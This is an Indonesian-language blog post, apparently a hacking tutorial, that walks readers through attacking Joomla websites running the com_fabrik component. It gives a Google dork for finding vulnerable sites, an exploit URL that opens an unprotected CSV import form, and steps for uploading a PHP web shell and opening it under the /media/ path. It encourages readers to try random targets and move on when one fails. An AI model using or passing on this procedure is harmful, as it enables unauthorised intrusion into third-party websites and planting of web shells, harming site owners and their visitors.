dan langsung bisa di eksekusi ..
Langsung aja ya :
1. Ketik dork berikut ke google :
"inurl:index.php?option=com_fabrik" *tanpa tanda kutip (")
2. Akan ada banyak web. Anda buka terserah anda.
3. Setelah dibuka. Masukkan exploit ini :
"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" *tanpa tanda kutip (")
Contoh :
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain dan jika berhasil akan muncul form upload seperti ini :
5. Klik "Choose File" trus masukan shell kamu, dan langsung klik "Import CSV" untuk mengupload..
6. Jika sudah, buka shell anda dengan format www.site.com/media/namashellkamu.php
7. Dan muncullah shell kesayangan anda. Langsung eksekusi deh :D
#Namun jika tidak muncul, mungkin karena web tersebut tidak mendukung file berformat php maupun html.
Sekian yang dapat saya berikan. Sabar jangan terburu buru :)
Selamat mencoba :)
Content Created : ./V404
0 comments:
Post a Comment